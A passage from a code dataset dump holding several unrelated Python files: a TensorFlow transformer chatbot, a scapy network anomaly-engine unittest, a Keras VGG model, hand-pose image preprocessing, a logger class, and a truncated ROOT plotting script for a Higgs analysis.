tf.transpose(scaled_attention, perm=[0, 2, 1, 3])\r\n\r\n concat_attention = tf.reshape(scaled_attention,(batch_size, -1, self.d_model))\r\n\r\n outputs = self.dense(concat_attention)\r\n\r\n return outputs\r\n\r\n# Implementation of Positional Encoding with Model subclassing\r\nclass PositionalEncoding(tf.keras.layers.Layer):\r\n\r\n def __init__(self, position, d_model):\r\n super(PositionalEncoding, self).__init__()\r\n self.pos_encoding = self.positional_encoding(position, d_model)\r\n\r\n def get_angles(self, position, i, d_model):\r\n angles = 1 / tf.pow(10000, (2 * (i // 2)) / tf.cast(d_model, tf.float32))\r\n return position * angles\r\n\r\n def positional_encoding(self, position, d_model):\r\n angle_rads = self.get_angles(\r\n position=tf.range(position, dtype=tf.float32)[:, tf.newaxis],\r\n i=tf.range(d_model, dtype=tf.float32)[tf.newaxis, :],\r\n d_model=d_model)\r\n # apply sin to even index in the array\r\n sines = tf.math.sin(angle_rads[:, 0::2])\r\n # apply cos to odd index in the array\r\n cosines = tf.math.cos(angle_rads[:, 1::2])\r\n\r\n pos_encoding = tf.concat([sines, cosines], axis=-1)\r\n pos_encoding = pos_encoding[tf.newaxis, ...]\r\n return tf.cast(pos_encoding, tf.float32)\r\n\r\n def call(self, inputs):\r\n return inputs + self.pos_encoding[:, :tf.shape(inputs)[1], :]\r\n\r\n# Implementation of an encoder layer with 
Functional API\r\ndef encoder_layer(units, d_model, num_heads, dropout, name=\"encoder_layer\"):\r\n inputs = tf.keras.Input(shape=(None, d_model), name=\"inputs\")\r\n padding_mask = tf.keras.Input(shape=(1, 1, None), name=\"padding_mask\")\r\n\r\n attention = MultiHeadAttention(\r\n d_model, num_heads, name=\"attention\")({\r\n 'query': inputs,\r\n 'key': inputs,\r\n 'value': inputs,\r\n 'mask': padding_mask\r\n })\r\n attention = tf.keras.layers.Dropout(rate=dropout)(attention)\r\n attention = tf.keras.layers.LayerNormalization(\r\n epsilon=1e-6)(inputs + attention)\r\n\r\n outputs = tf.keras.layers.Dense(units=units, activation='relu')(attention)\r\n outputs = tf.keras.layers.Dense(units=d_model)(outputs)\r\n outputs = tf.keras.layers.Dropout(rate=dropout)(outputs)\r\n outputs = tf.keras.layers.LayerNormalization(\r\n epsilon=1e-6)(attention + outputs)\r\n\r\n return tf.keras.Model(\r\n inputs=[inputs, padding_mask], outputs=outputs, name=name)\r\n\r\n# Implementation of encoder with Functional API\r\ndef encoder(vocab_size,num_layers,units,d_model,num_heads,dropout,name=\"encoder\"):\r\n inputs = tf.keras.Input(shape=(None,), name=\"inputs\")\r\n padding_mask = tf.keras.Input(shape=(1, 1, None), name=\"padding_mask\")\r\n\r\n embeddings = tf.keras.layers.Embedding(vocab_size, d_model)(inputs)\r\n embeddings *= tf.math.sqrt(tf.cast(d_model, tf.float32))\r\n embeddings = PositionalEncoding(vocab_size, d_model)(embeddings)\r\n\r\n outputs = tf.keras.layers.Dropout(rate=dropout)(embeddings)\r\n\r\n for i in range(num_layers):\r\n outputs = encoder_layer(\r\n units=units,\r\n d_model=d_model,\r\n num_heads=num_heads,\r\n dropout=dropout,\r\n name=\"encoder_layer_{}\".format(i),\r\n )([outputs, padding_mask])\r\n\r\n return tf.keras.Model(\r\n inputs=[inputs, padding_mask], outputs=outputs, name=name)\r\n\r\nsample_encoder = encoder(\r\n vocab_size=8192,\r\n num_layers=2,\r\n units=512,\r\n d_model=128,\r\n num_heads=4,\r\n dropout=0.3,\r\n name=\"sample_encoder\")\r\n\r\n# Implementation of decoder layer with Functional API\r\ndef decoder_layer(units, d_model, num_heads, dropout, name=\"decoder_layer\"):\r\n inputs = tf.keras.Input(shape=(None, d_model), name=\"inputs\")\r\n enc_outputs = tf.keras.Input(shape=(None, d_model), name=\"encoder_outputs\")\r\n look_ahead_mask = tf.keras.Input(\r\n shape=(1, None, None), name=\"look_ahead_mask\")\r\n padding_mask = tf.keras.Input(shape=(1, 1, None), name='padding_mask')\r\n\r\n attention1 = MultiHeadAttention(\r\n d_model, num_heads, name=\"attention_1\")(inputs={\r\n 'query': inputs,\r\n 'key': inputs,\r\n 'value': inputs,\r\n 'mask': look_ahead_mask\r\n })\r\n attention1 = tf.keras.layers.LayerNormalization(\r\n epsilon=1e-6)(attention1 + inputs)\r\n\r\n attention2 = MultiHeadAttention(\r\n d_model, num_heads, name=\"attention_2\")(inputs={\r\n 'query': attention1,\r\n 'key': enc_outputs,\r\n 'value': enc_outputs,\r\n 'mask': padding_mask\r\n })\r\n attention2 = tf.keras.layers.Dropout(rate=dropout)(attention2)\r\n attention2 = tf.keras.layers.LayerNormalization(\r\n epsilon=1e-6)(attention2 + attention1)\r\n\r\n outputs = tf.keras.layers.Dense(units=units, activation='relu')(attention2)\r\n outputs = tf.keras.layers.Dense(units=d_model)(outputs)\r\n outputs = tf.keras.layers.Dropout(rate=dropout)(outputs)\r\n outputs = tf.keras.layers.LayerNormalization(\r\n epsilon=1e-6)(outputs + attention2)\r\n\r\n return tf.keras.Model(\r\n inputs=[inputs, enc_outputs, look_ahead_mask, padding_mask],\r\n outputs=outputs,\r\n name=name)\r\n\r\n# 
Implementation of a decoder with Functional API\r\ndef decoder(vocab_size,\r\n num_layers,\r\n units,\r\n d_model,\r\n num_heads,\r\n dropout,\r\n name='decoder'):\r\n inputs = tf.keras.Input(shape=(None,), name='inputs')\r\n enc_outputs = tf.keras.Input(shape=(None, d_model), name='encoder_outputs')\r\n look_ahead_mask = tf.keras.Input(\r\n shape=(1, None, None), name='look_ahead_mask')\r\n padding_mask = tf.keras.Input(shape=(1, 1, None), name='padding_mask')\r\n \r\n embeddings = tf.keras.layers.Embedding(vocab_size, d_model)(inputs)\r\n embeddings *= tf.math.sqrt(tf.cast(d_model, tf.float32))\r\n embeddings = PositionalEncoding(vocab_size, d_model)(embeddings)\r\n\r\n outputs = tf.keras.layers.Dropout(rate=dropout)(embeddings)\r\n\r\n for i in range(num_layers):\r\n outputs = decoder_layer(\r\n units=units,\r\n d_model=d_model,\r\n num_heads=num_heads,\r\n dropout=dropout,\r\n name='decoder_layer_{}'.format(i),\r\n )(inputs=[outputs, enc_outputs, look_ahead_mask, padding_mask])\r\n\r\n return tf.keras.Model(\r\n inputs=[inputs, enc_outputs, look_ahead_mask, padding_mask],\r\n outputs=outputs,\r\n name=name)\r\n\r\nsample_decoder_layer = decoder_layer(\r\n units=512,\r\n d_model=128,\r\n num_heads=4,\r\n dropout=0.3,\r\n name=\"sample_decoder_layer\")\r\n\r\ndef create_padding_mask(x):\r\n mask = tf.cast(tf.math.equal(x, 0), tf.float32)\r\n # (batch_size, 1, 1, sequence length)\r\n return mask[:, tf.newaxis, tf.newaxis, :]\r\n\r\ndef create_look_ahead_mask(x):\r\n seq_len = tf.shape(x)[1]\r\n look_ahead_mask = 1 - tf.linalg.band_part(tf.ones((seq_len, seq_len)), -1, 0)\r\n padding_mask = create_padding_mask(x)\r\n return tf.maximum(look_ahead_mask, padding_mask)\r\n\r\ndef transformer(vocab_size,num_layers,units,d_model,num_heads,dropout,name=\"transformer\"):\r\n inputs = tf.keras.Input(shape=(None,), name=\"inputs\")\r\n dec_inputs = tf.keras.Input(shape=(None,), name=\"dec_inputs\")\r\n\r\n enc_padding_mask = tf.keras.layers.Lambda(\r\n create_padding_mask, output_shape=(1, 1, None),\r\n name='enc_padding_mask')(inputs)\r\n # mask the future tokens for decoder inputs at the 1st attention block\r\n look_ahead_mask = tf.keras.layers.Lambda(\r\n create_look_ahead_mask,\r\n output_shape=(1, None, None),\r\n name='look_ahead_mask')(dec_inputs)\r\n # mask the encoder outputs for the 2nd attention block\r\n dec_padding_mask = tf.keras.layers.Lambda(\r\n create_padding_mask, output_shape=(1, 1, None),\r\n name='dec_padding_mask')(inputs)\r\n\r\n enc_outputs = encoder(\r\n vocab_size=vocab_size,\r\n num_layers=num_layers,\r\n units=units,\r\n d_model=d_model,\r\n num_heads=num_heads,\r\n dropout=dropout,\r\n )(inputs=[inputs, enc_padding_mask])\r\n\r\n dec_outputs = decoder(\r\n vocab_size=vocab_size,\r\n num_layers=num_layers,\r\n units=units,\r\n d_model=d_model,\r\n num_heads=num_heads,\r\n dropout=dropout,\r\n )(inputs=[dec_inputs, enc_outputs, look_ahead_mask, dec_padding_mask])\r\n\r\n outputs = tf.keras.layers.Dense(units=vocab_size, name=\"outputs\")(dec_outputs)\r\n\r\n return tf.keras.Model(inputs=[inputs, dec_inputs], outputs=outputs, name=name)\r\n\r\nNUM_LAYERS = 2\r\nD_MODEL = 256\r\nNUM_HEADS = 8\r\nUNITS = 512\r\nDROPOUT = 0.1\r\n\r\nmodel = transformer(vocab_size=VOCAB_SIZE,num_layers=NUM_LAYERS,units=UNITS,d_model=D_MODEL,num_heads=NUM_HEADS,dropout=DROPOUT)\r\n\r\ndef loss_function(y_true, y_pred):\r\n y_true = tf.reshape(y_true, shape=(-1, MAX_LENGTH - 1))\r\n \r\n loss = tf.keras.losses.SparseCategoricalCrossentropy(\r\n from_logits=True, reduction='none')(y_true, 
y_pred)\r\n\r\n mask = tf.cast(tf.not_equal(y_true, 0), tf.float32)\r\n loss = tf.multiply(loss, mask)\r\n\r\n return tf.reduce_mean(loss)\r\n\r\nclass CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule):\r\n\r\n def __init__(self, d_model, warmup_steps=4000):\r\n super(CustomSchedule, self).__init__()\r\n\r\n self.d_model = d_model\r\n self.d_model = tf.cast(self.d_model, tf.float32)\r\n\r\n self.warmup_steps = warmup_steps\r\n\r\n def __call__(self, step):\r\n arg1 = tf.math.rsqrt(step)\r\n arg2 = step * (self.warmup_steps**-1.5)\r\n\r\n return tf.math.rsqrt(self.d_model) * tf.math.minimum(arg1, arg2)\r\n\r\nlearning_rate = CustomSchedule(D_MODEL)\r\n\r\noptimizer = tf.keras.optimizers.Adam(\r\n learning_rate, beta_1=0.9, beta_2=0.98, epsilon=1e-9)\r\n\r\ndef accuracy(y_true, y_pred):\r\n # ensure labels have shape (batch_size, MAX_LENGTH - 1)\r\n y_true = tf.reshape(y_true, shape=(-1, MAX_LENGTH - 1))\r\n accuracy = tf.metrics.SparseCategoricalAccuracy()(y_true, y_pred)\r\n return accuracy\r\n\r\nmodel.compile(optimizer=optimizer, loss=loss_function, metrics=[accuracy])\r\n\r\ntf.config.run_functions_eagerly(True)\r\n\r\nmodel.load_weights(\"weight_model.h5\")\r\n\r\n# Preprocessing sentences \r\ndef preprocess_sentence(sentence):\r\n sentence = sentence.lower().strip()\r\n # creating a space between a word and the punctuation following it\r\n # eg: \"he is a boy.\" => \"he is a boy .\"\r\n sentence = re.sub(r\"([?.!,])\", r\" \\1 \", sentence)\r\n sentence = re.sub(r'[\" \"]+', \" \", sentence)\r\n # removing contractions\r\n sentence = re.sub(r\"i'm\", \"i am\", sentence)\r\n sentence = re.sub(r\"he's\", \"he is\", sentence)\r\n sentence = re.sub(r\"she's\", \"she is\", sentence)\r\n sentence = re.sub(r\"it's\", \"it is\", sentence)\r\n sentence = re.sub(r\"that's\", \"that is\", sentence)\r\n sentence = re.sub(r\"what's\", \"that is\", sentence)\r\n sentence = re.sub(r\"where's\", \"where is\", sentence)\r\n sentence = re.sub(r\"how's\", \"how is\", sentence)\r\n sentence = re.sub(r\"\\'ll\", \" will\", sentence)\r\n sentence = re.sub(r\"\\'ve\", \" have\", sentence)\r\n sentence = re.sub(r\"\\'re\", \" are\", sentence)\r\n sentence = re.sub(r\"\\'d\", \" would\", sentence)\r\n sentence = re.sub(r\"\\'re\", \" are\", sentence)\r\n sentence = re.sub(r\"won't\", \"will not\", sentence)\r\n sentence = re.sub(r\"can't\", \"cannot\", sentence)\r\n sentence = re.sub(r\"n't\", \" not\", sentence)\r\n sentence = re.sub(r\"n'\", \"ng\", sentence)\r\n sentence = re.sub(r\"'bout\", \"about\", sentence)\r\n # replacing everything with space except (a-z, A-Z, \".\", \"?\", \"!\", \",\")\r\n sentence = re.sub(r\"[^a-zA-Z?.!,]+\", \" \", sentence)\r\n sentence = sentence.strip()\r\n return sentence\r\n\r\n# Transformer evaluation implementation\r\ndef evaluate(sentence):\r\n sentence = preprocess_sentence(sentence)\r\n sentence = tf.expand_dims(START_TOKEN + tokenizer.encode(sentence) + END_TOKEN, axis=0)\r\n output = tf.expand_dims(START_TOKEN, 0)\r\n for i in range(MAX_LENGTH):\r\n predictions = model(inputs=[sentence, output], training=False)\r\n # select the last word from the seq_len dimension\r\n predictions = predictions[:, -1:, :]\r\n predicted_id = tf.cast(tf.argmax(predictions, axis=-1), tf.int32)\r\n\r\n # return the result if the predicted_id is equal to the end token \r\n if tf.equal(predicted_id, END_TOKEN[0]):\r\n break\r\n\r\n # concatenated the predicted_id to the output which is given to the decoder as its input.\r\n output = tf.concat([output, predicted_id], 
axis=-1)\r\n\r\n return tf.squeeze(output, axis=0)\r\n\r\ndef predict(sentence):\r\n prediction = evaluate(sentence)\r\n\r\n predicted_sentence = tokenizer.decode([i for i in prediction if i < tokenizer.vocab_size]) # try with prediction only no i\r\n\r\n return predicted_sentence","repo_name":"HHNM/Chatbot-with-Transformer","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":16851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74466497768","text":"import unittest\nfrom scapy.layers.l2 import Ether\nfrom scapy.layers.inet import IP, UDP, TCP\n\nfrom src import db\nfrom src.anamoly_detection.anomaly_engine import AnomalyEngine\n\n# Setup engine once for testing\nconn = db\nengine = AnomalyEngine(db)\n\n\nclass TestIPSignature(unittest.TestCase):\n def test_engine(self):\n \"\"\"\n Test that the engine initializes and properly populates its signatures\n :return: None\n \"\"\"\n self.assertIsNotNone(engine)\n self.assertTrue(engine.frequency_signatures != [])\n self.assertTrue(engine.traffic_signatures == [])\n\n # Check that the returned rows are all turned into equations\n self.assertEqual(len(engine.get_equation_strings()), len(engine.frequency_signatures))\n\n def test_engine_packet_handling(self):\n \"\"\"\n Test that the signatures load properly and are called upon correctly by the engine\n :return: None\n \"\"\"\n udp_packet = Ether() / IP() / UDP(dport=80)\n tcp_packet = Ether() / IP() / TCP(dport=80)\n\n # Call the engine using the two packets as parameters\n engine.check_signatures(udp_packet)\n engine.check_signatures(tcp_packet)\n\n # Confirm the signatures regarding IP & TCP/UDP are triggered (3 signatures in total)\n triggered_signatures = list(filter(lambda x: x._window_frequency > 0, engine.frequency_signatures))\n self.assertEqual(3, len(triggered_signatures))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"briweinstein/tinyHIPPO","sub_path":"tests/signature_tests/frequency_tests/test_anomaly_engine.py","file_name":"test_anomaly_engine.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"70246140649","text":"import tensorflow as tf\n\n\nclass Vgg(tf.keras.Model):\n def __init__(self, drop=0.30):\n super(Vgg, self).__init__()\n\n # Define the convolutional and batch normalization layers\n self.conv_bn_layers = []\n for i, filters in enumerate([32, 64, 128, 256]):\n self.conv_bn_layers.append(\n tf.keras.layers.Conv2D(filters=filters, kernel_size=3, padding='same', activation='relu',\n name=f'conv{i + 1}a'))\n self.conv_bn_layers.append(tf.keras.layers.BatchNormalization())\n self.conv_bn_layers.append(\n tf.keras.layers.Conv2D(filters=filters, kernel_size=3, padding='same', activation='relu',\n name=f'conv{i + 1}b'))\n self.conv_bn_layers.append(tf.keras.layers.BatchNormalization())\n self.conv_bn_layers.append(tf.keras.layers.MaxPool2D(pool_size=(2, 2), strides=2))\n\n self.flatten = tf.keras.layers.Flatten()\n self.lin1 = tf.keras.layers.Dense(units=4096, activation='relu')\n self.lin2 = tf.keras.layers.Dense(units=4096, activation='relu')\n self.drop = tf.keras.layers.Dropout(rate=drop)\n self.lin3 = tf.keras.layers.Dense(7, activation='softmax')\n\n def call(self, x):\n # Pass the input through the convolutional and batch normalization layers\n for layer in self.conv_bn_layers:\n x = layer(x)\n\n x = self.flatten(x)\n x = self.lin1(x)\n x = self.drop(x)\n x = 
self.lin2(x)\n x = self.drop(x)\n x = self.lin3(x)\n return x\n","repo_name":"hasan-rakibul/MaskTheFER","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38647597222","text":"import os\nimport cv2\nimport numpy as np\nfrom config import cfg\nimport random\nimport math\n\ndef load_img(path, order='RGB'):\n \n # load\n img = cv2.imread(path, cv2.IMREAD_COLOR | cv2.IMREAD_IGNORE_ORIENTATION)\n if not isinstance(img, np.ndarray):\n raise IOError(\"Fail to read %s\" % path)\n\n if order=='RGB':\n img = img[:,:,::-1].copy()\n \n img = img.astype(np.float32)\n return img\n\ndef load_skeleton(path, joint_num):\n\n # load joint info (name, parent_id)\n skeleton = [{} for _ in range(joint_num)]\n with open(path) as fp:\n for line in fp:\n if line[0] == '#': continue\n splitted = line.split(' ')\n joint_name, joint_id, joint_parent_id = splitted\n joint_id, joint_parent_id = int(joint_id), int(joint_parent_id)\n skeleton[joint_id]['name'] = joint_name\n skeleton[joint_id]['parent_id'] = joint_parent_id\n # save child_id\n for i in range(len(skeleton)):\n joint_child_id = []\n for j in range(len(skeleton)):\n if skeleton[j]['parent_id'] == i:\n joint_child_id.append(j)\n skeleton[i]['child_id'] = joint_child_id\n \n return skeleton\n\ndef get_aug_config():\n trans_factor = 0.15\n scale_factor = 0.25\n rot_factor = 45\n color_factor = 0.2\n \n trans = [np.random.uniform(-trans_factor, trans_factor), np.random.uniform(-trans_factor, trans_factor)]\n scale = np.clip(np.random.randn(), -1.0, 1.0) * scale_factor + 1.0\n rot = np.clip(np.random.randn(), -2.0,\n 2.0) * rot_factor if random.random() <= 0.6 else 0\n do_flip = random.random() <= 0.5\n c_up = 1.0 + color_factor\n c_low = 1.0 - color_factor\n color_scale = np.array([random.uniform(c_low, c_up), random.uniform(c_low, c_up), random.uniform(c_low, c_up)])\n\n return trans, scale, rot, do_flip, color_scale\n\ndef augmentation(img, bbox, joint_coord, joint_valid, hand_type, mode, joint_type):\n img = img.copy(); \n joint_coord = joint_coord.copy(); \n hand_type = hand_type.copy();\n\n original_img_shape = img.shape\n joint_num = len(joint_coord)\n \n if mode == 'train':\n trans, scale, rot, do_flip, color_scale = get_aug_config()\n else:\n trans, scale, rot, do_flip, color_scale = [0,0], 1.0, 0.0, False, np.array([1,1,1])\n \n bbox[0] = bbox[0] + bbox[2] * trans[0]\n bbox[1] = bbox[1] + bbox[3] * trans[1]\n img, trans, inv_trans = generate_patch_image(img, bbox, do_flip, scale, rot, cfg.input_img_shape)\n img = np.clip(img * color_scale[None,None,:], 0, 255)\n \n if do_flip:\n joint_coord[:,0] = original_img_shape[1] - joint_coord[:,0] - 1\n joint_coord[joint_type['right']], joint_coord[joint_type['left']] = joint_coord[joint_type['left']].copy(), joint_coord[joint_type['right']].copy()\n joint_valid[joint_type['right']], joint_valid[joint_type['left']] = joint_valid[joint_type['left']].copy(), joint_valid[joint_type['right']].copy()\n hand_type[0], hand_type[1] = hand_type[1].copy(), hand_type[0].copy()\n for i in range(joint_num):\n joint_coord[i,:2] = trans_point2d(joint_coord[i,:2], trans)\n joint_valid[i] = joint_valid[i] * (joint_coord[i,0] >= 0) * (joint_coord[i,0] < cfg.input_img_shape[1]) * (joint_coord[i,1] >= 0) * (joint_coord[i,1] < cfg.input_img_shape[0])\n\n return img, joint_coord, joint_valid, hand_type, inv_trans\n\ndef transform_input_to_output_space(joint_coord, joint_valid, 
rel_root_depth, root_valid, root_joint_idx, joint_type):\n # transform to output heatmap space\n joint_coord = joint_coord.copy(); joint_valid = joint_valid.copy()\n \n joint_coord[:,0] = joint_coord[:,0] / cfg.input_img_shape[1] * cfg.output_hm_shape[2]\n joint_coord[:,1] = joint_coord[:,1] / cfg.input_img_shape[0] * cfg.output_hm_shape[1]\n joint_coord[joint_type['right'],2] = joint_coord[joint_type['right'],2] - joint_coord[root_joint_idx['right'],2]\n joint_coord[joint_type['left'],2] = joint_coord[joint_type['left'],2] - joint_coord[root_joint_idx['left'],2]\n \n joint_coord[:,2] = (joint_coord[:,2] / (cfg.bbox_3d_size/2) + 1)/2. * cfg.output_hm_shape[0]\n joint_valid = joint_valid * ((joint_coord[:,2] >= 0) * (joint_coord[:,2] < cfg.output_hm_shape[0])).astype(np.float32)\n rel_root_depth = (rel_root_depth / (cfg.bbox_3d_size_root/2) + 1)/2. * cfg.output_root_hm_shape\n root_valid = root_valid * ((rel_root_depth >= 0) * (rel_root_depth < cfg.output_root_hm_shape)).astype(np.float32)\n \n return joint_coord, joint_valid, rel_root_depth, root_valid\n\ndef get_bbox(joint_img, joint_valid):\n x_img = joint_img[:,0][joint_valid==1]; y_img = joint_img[:,1][joint_valid==1];\n xmin = min(x_img); ymin = min(y_img); xmax = max(x_img); ymax = max(y_img);\n\n x_center = (xmin+xmax)/2.; width = xmax-xmin;\n xmin = x_center - 0.5*width*1.2\n xmax = x_center + 0.5*width*1.2\n \n y_center = (ymin+ymax)/2.; height = ymax-ymin;\n ymin = y_center - 0.5*height*1.2\n ymax = y_center + 0.5*height*1.2\n\n bbox = np.array([xmin, ymin, xmax-xmin, ymax-ymin]).astype(np.float32)\n return bbox\n\ndef process_bbox(bbox, original_img_shape):\n\n # aspect ratio preserving bbox\n w = bbox[2]\n h = bbox[3]\n c_x = bbox[0] + w/2.\n c_y = bbox[1] + h/2.\n aspect_ratio = cfg.input_img_shape[1]/cfg.input_img_shape[0]\n if w > aspect_ratio * h:\n h = w / aspect_ratio\n elif w < aspect_ratio * h:\n w = h * aspect_ratio\n bbox[2] = w*1.25\n bbox[3] = h*1.25\n bbox[0] = c_x - bbox[2]/2.\n bbox[1] = c_y - bbox[3]/2.\n\n return bbox\n\ndef generate_patch_image(cvimg, bbox, do_flip, scale, rot, out_shape):\n img = cvimg.copy()\n img_height, img_width, img_channels = img.shape\n\n bb_c_x = float(bbox[0] + 0.5*bbox[2])\n bb_c_y = float(bbox[1] + 0.5*bbox[3])\n bb_width = float(bbox[2])\n bb_height = float(bbox[3])\n\n if do_flip:\n img = img[:, ::-1, :]\n bb_c_x = img_width - bb_c_x - 1\n \n trans = gen_trans_from_patch_cv(bb_c_x, bb_c_y, bb_width, bb_height, out_shape[1], out_shape[0], scale, rot)\n img_patch = cv2.warpAffine(img, trans, (int(out_shape[1]), int(out_shape[0])), flags=cv2.INTER_LINEAR)\n img_patch = img_patch.astype(np.float32)\n inv_trans = gen_trans_from_patch_cv(bb_c_x, bb_c_y, bb_width, bb_height, out_shape[1], out_shape[0], scale, rot, inv=True)\n\n return img_patch, trans, inv_trans\n\ndef rotate_2d(pt_2d, rot_rad):\n x = pt_2d[0]\n y = pt_2d[1]\n sn, cs = np.sin(rot_rad), np.cos(rot_rad)\n xx = x * cs - y * sn\n yy = x * sn + y * cs\n return np.array([xx, yy], dtype=np.float32)\n\ndef gen_trans_from_patch_cv(c_x, c_y, src_width, src_height, dst_width, dst_height, scale, rot, inv=False):\n # augment size with scale\n src_w = src_width * scale\n src_h = src_height * scale\n src_center = np.array([c_x, c_y], dtype=np.float32)\n\n # augment rotation\n rot_rad = np.pi * rot / 180\n src_downdir = rotate_2d(np.array([0, src_h * 0.5], dtype=np.float32), rot_rad)\n src_rightdir = rotate_2d(np.array([src_w * 0.5, 0], dtype=np.float32), rot_rad)\n\n dst_w = dst_width\n dst_h = dst_height\n dst_center = 
np.array([dst_w * 0.5, dst_h * 0.5], dtype=np.float32)\n dst_downdir = np.array([0, dst_h * 0.5], dtype=np.float32)\n dst_rightdir = np.array([dst_w * 0.5, 0], dtype=np.float32)\n\n src = np.zeros((3, 2), dtype=np.float32)\n src[0, :] = src_center\n src[1, :] = src_center + src_downdir\n src[2, :] = src_center + src_rightdir\n\n dst = np.zeros((3, 2), dtype=np.float32)\n dst[0, :] = dst_center\n dst[1, :] = dst_center + dst_downdir\n dst[2, :] = dst_center + dst_rightdir\n \n if inv:\n trans = cv2.getAffineTransform(np.float32(dst), np.float32(src))\n else:\n trans = cv2.getAffineTransform(np.float32(src), np.float32(dst))\n\n trans = trans.astype(np.float32)\n return trans\n\ndef trans_point2d(pt_2d, trans):\n src_pt = np.array([pt_2d[0], pt_2d[1], 1.]).T\n dst_pt = np.dot(trans, src_pt)\n return dst_pt[0:2]\n\n\n","repo_name":"enpeizhao/CVprojects","sub_path":"codes/8.结印识别/common/utils/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":8016,"program_lang":"python","lang":"en","doc_type":"code","stars":1748,"dataset":"github-code","pt":"53"} +{"seq_id":"38617579408","text":"import logging\n\n\nclass Logger:\n def __init__(self, error_log_file=\"error.log\", warn_log_file=\"warn.log\"):\n self.logger = logging.getLogger(__name__)\n self.logger.setLevel(logging.DEBUG)\n formatter = logging.Formatter(\"%(asctime)s - %(levelname)s - %(message)s\")\n # error log store with file\n file_handler = logging.FileHandler(error_log_file)\n file_handler.setLevel(logging.ERROR)\n file_handler.setFormatter(formatter)\n self.logger.addHandler(file_handler)\n # info log output in console\n console_handler = logging.StreamHandler()\n console_handler.setLevel(logging.INFO)\n console_handler.setFormatter(formatter)\n self.logger.addHandler(console_handler)\n # warn log store with file\n warn_file_handler = logging.FileHandler(warn_log_file)\n warn_file_handler.setLevel(logging.WARN)\n warn_file_handler.setFormatter(formatter)\n self.logger.addHandler(warn_file_handler)\n\n def log_error(self, message, exception=None):\n self.logger.exception(message, exc_info=exception)\n\n def log_info(self, message):\n self.logger.info(message)\n\n def log_warn(self, message):\n self.logger.warn(message)\n\n\n# export logger\nlogger = Logger()\n","repo_name":"aiyogg/sse-bond","sub_path":"logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2069396863","text":"import ROOT\nimport tdrstyle\n\n# CMS Style (estilo para los plots)\ntdrstyle.setTDRStyle()\n\n# Carga el archivo con los histogramas\n\nfile=ROOT.TFile(\"histos.root\",\"READONLY\")\n\n#histos=[\"Z_mass\",\"Recoil_mass\",\"LeadMuon_Pt\",\"LeadMuon_Theta\",\"LeadMuon_Phi\",\\\n#\t\"SecondMuon_Pt\",\"SecondMuon_Theta\",\"SecondMuon_Phi\",\"Z_theta\",\"Recoil_theta\",\\\n#\t\"Z_Pt\",\"Recoil_Pt\",\"Z_y\",\"Recoil_y\",\"NMuons\",\"NElectrons\",\"cos_Recoil_theta\",\\\n#\t\"cos_missing_theta\"] # para pintar todos a la vez\n\nhistos=[\"Recoil_mass\"] # para ir rapido, solo un plot\n\n# las muestras : \nsampleName=[\"WW\",\"ZZ\",\"HZ\"]\nnProcesses=len(sampleName)\n\n# Los factores de normalizacion de cada proceso vienen dados por la seccion eficaz:\n# eeHZ: 0.201868 pb\n# eeZZ: 1.35899 pb\n# eeWW: 16.4385 pb\nxsection=[16.4385,1.35899,0.201868]\n# Comentario a mi misma: para que esto fuese mas elegante, seria mejor haber hecho un mapa\n# o un diccionario (muestra-> seccion eficaz) \n\n# Luminosidad 
acumulada: 5 ab-1 = 5000 fb-1 = 500000 pb-1\nluminosity = 5e6\n\n# Numero de sucesos MC producidos originamente.\n# En este caso todas las muestras originales tenian 10M de sucesos.\ntotalNumberOfEvents=10000000\n\n# La normalizacion de los histogramas seguira :\n# N_Sucesos = xsection * luminosidad\n# Peso = xsection * luminosidad / SucesosGenerados en total \n\n# Color de los histogramas\ncolor=[ROOT.kBlue+1,ROOT.kGreen+2,ROOT.kRed]\n\n# Definimos una funcion para dar estilo y normalizar los histogramas \ndef StyleHisto(sample,variab,histColor,xsec,suffix=\"\"):\n histo =file.Get(variab+\"_ee\"+sample)\t\t\n histo.SetName(\"h\"+variab+\"_ee\"+sample+suffix)\n # Estilo:\n histo.SetLineColor(histColor)\n if sample!=\"HZ\":\n \thisto.SetFillColor(histColor)\n histo.SetLineWidth(3)\n\n # Aqui se aplica la normalizacion: \n histo.Scale(xsec*luminosity/totalNumberOfEvents)\n\n return histo\n\n\n# Loop sobre los histogramas guardados en 'histos.root'\n\nfor histoName in histos:\n\n\n # Definimos un 'stack' de histogramas apilados:\n h={}\n hStack = ROOT.THStack()\n \n print (\"YIELDS (from %s)\" %histoName)\n for i in range(nProcesses):\n h[ sampleName[i] ] = StyleHisto(sampleName[i],histoName,color[i],xsection[i])\n print (\"... %s %2d\" %(sampleName[i],h[ sampleName[i] ].Integral() ) )\n # if sampleName[i]!=\"HZ\" : # para pintar la señal por separado\n hStack.Add( h[ sampleName[i] ] )\n\n\n # Ahora pintamos los histogramas:\n c1 = ROOT.TCanvas(\"c1\",\"HZ analysis canvas\", 650,600)\n ROOT.gStyle.SetOptTitle(True)\n \n c1.SetTicks(1,1)\n c1.SetLeftMargin(0.15)\n c1.SetRightMargin(0.08)\n c1.SetTopMargin(0.06)\n \n hStack.Draw(\"hist\")\n# h[\"HZ\"].Draw(\"hist,sames\")\t# Opcion para pintar la segnal por separado\n \n ylabel=\"events\"\n xlabel=h[sampleName[0]].GetXaxis().GetTitle() #\"DiMuon Mass [GeV]\"\n \n hStack.GetXaxis().SetTitle(xlabel)\n hStack.GetYaxis().SetTitle(ylabel)\n \n hStack.GetYaxis().SetTitleOffset(1.4)\n hStack.GetXaxis().SetTitleOffset(1.2)\n\n maxY=hStack.GetMaximum()\n if h[\"HZ\"].GetMaximum()> maxY:\n maxY=h[\"HZ\"].GetMaximum() \n hStack.SetMaximum(maxY*1.2)\n \n # Leyenda\n leg = ROOT.TLegend(0.80,0.70,0.93,0.93)\n leg.SetFillStyle(0)\n leg.SetBorderSize(0)\n for 